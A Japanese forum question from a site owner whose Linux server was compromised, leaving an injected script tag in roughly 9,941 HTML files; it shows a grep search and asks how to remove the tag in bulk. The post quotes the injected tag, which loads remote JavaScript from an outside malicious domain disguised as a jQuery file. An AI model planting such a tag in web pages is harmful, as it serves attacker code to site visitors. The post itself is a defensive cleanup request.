私のサーバーは今週感染し、攻撃者はいくつかのファイルにスクリプトを挿入するスクリプトを実行しました。現在、私のドメインは Google でブラックリストに登録されています。
挿入されたコードは次のとおりです。
<script language="JavaScript" src="http://sexfromindia.com/linkex/jquery-1.6.5.min.js" type="text/javascript"></script>
気をつけろ!マルウェアです!
だから、私はこのコマンドを実行しました(これはLinuxサーバーです):
grep -r "sexfromindia.com" /home/mydomain/public_html/
そして、このコマンドは 9941 個のファイルを返しました:/
<script language="JavaScript" src="http://sexfromindia.com/linkex/jquery-1.6.5.min.js type="text/javascript"></script>" " (ダブル スペース)を検索して置換するスクリプトを実行したいと思います。感染したファイルはすべて .html にあるため、ダブル スペースは何の害もありません。
現在、すべてのファイルが感染しているわけではなく、9941 (約 50%) のみが感染しています。
このごちゃごちゃはどうやって掃除すればいいの?awk、sed、grep、perl を使用する必要がありますか? 誰でも例を挙げてもらえますか?
ありがとう。